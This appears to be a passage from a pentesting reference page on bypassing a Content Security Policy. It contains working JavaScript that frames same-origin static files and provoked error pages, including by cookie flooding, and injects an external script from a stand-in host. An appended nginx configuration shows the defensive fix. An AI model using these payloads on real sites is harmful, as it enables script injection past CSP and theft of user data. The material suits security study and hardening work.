A configuration such as:

```
Content-Security-Policy: default-src 'self' 'unsafe-inline';
```

prohibits the use of any function that executes code passed in as a string. For example, `eval`, and `setTimeout`/`setInterval` when given a string argument, are all blocked because the policy does not include `'unsafe-eval'`. Any content from external origins is also blocked, including images, CSS, WebSockets and, in particular, JS.

### Via Text & Images

It has been observed that modern browsers wrap images and text files in HTML to improve how they are displayed (for example, adding a background, centering, etc.). Consequently, if an image or text file such as `favicon.ico` or `robots.txt` is opened through an `iframe`, it is rendered as HTML. Crucially, these responses often carry no CSP header and may also lack X-Frame-Options, which allows arbitrary JavaScript to be executed from them:

```javascript
// Frame a same-origin static file; the browser renders it as an HTML document
// that is served without the page's CSP
frame = document.createElement("iframe")
frame.src = "/css/bootstrap.min.css"
document.body.appendChild(frame)

// Inject an external script into that CSP-less frame
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```

### Via Errors

Similarly, error responses, just like text files or images, typically arrive without CSP headers and may lack X-Frame-Options.
Errors can be provoked so that the error page loads inside an iframe, enabling the following steps:

```javascript
// Inducing an nginx error
frame = document.createElement("iframe")
frame.src = "/%2e%2e%2f"
document.body.appendChild(frame)

// Triggering an error with a long URL
frame = document.createElement("iframe")
frame.src = "/" + "A".repeat(20000)
document.body.appendChild(frame)

// Generating an error via oversized cookies
for (var i = 0; i < 5; i++) {
    document.cookie = i + "=" + "a".repeat(4000)
}
frame = document.createElement("iframe")
frame.src = "/"
document.body.appendChild(frame)

// Removing the cookies afterwards is essential, otherwise every
// subsequent request to the origin keeps failing
for (var i = 0; i < 5; i++) {
    document.cookie = i + "="
}
```

After triggering one of the conditions above, JavaScript execution inside the iframe can be obtained as follows:

```javascript
script = document.createElement("script")
script.src = "//example.com/csp.js"
window.frames[0].document.head.appendChild(script)
```

## References

- [https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/)

{{#include ../../banners/hacktricks-training.md}}
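Both techniques above depend on same-origin responses (static files, error pages) that reach the browser without CSP or X-Frame-Options. The following nginx configuration is an added defensive example, not from the original page or the referenced article; the server name, paths and header values are placeholders, and the key point is the `always` parameter, without which nginx omits `add_header` headers on 4xx/5xx responses.

```nginx
# Added example: deliver CSP and framing restrictions on every response,
# including static assets and error pages. Names and paths are placeholders.
server {
    listen 443 ssl;
    server_name example.com;      # placeholder
    root /var/www/app;            # placeholder path

    # 'always' makes nginx emit these headers on 4xx/5xx responses as well.
    # Without it, add_header only applies to 2xx/3xx, so the error pages
    # framed in the bypass above would ship with no CSP at all.
    # frame-ancestors 'none' stops the response being framed in the first place.
    add_header Content-Security-Policy "default-src 'self'; frame-ancestors 'none'" always;
    add_header X-Frame-Options "DENY" always;

    # Static files (favicon.ico, robots.txt, CSS, JS, images) inherit the
    # server-level add_header directives. NOTE: nginx inherits add_header only
    # if the location defines none of its own; adding any add_header here
    # would drop the inherited ones, so they would have to be repeated.
    location ~* \.(css|js|ico|txt|png|jpg|svg)$ {
        try_files $uri =404;
    }

    # Custom error pages are served from an internal location and still carry
    # the headers because of 'always' at the server level.
    error_page 400 403 404 414 500 502 503 /error.html;
    location = /error.html {
        internal;
    }

    location / {
        try_files $uri $uri/ =404;
    }
}
```

Verify the fix by requesting a static file and a nonexistent path with `curl -I` and confirming that both headers appear on each response, including the 404.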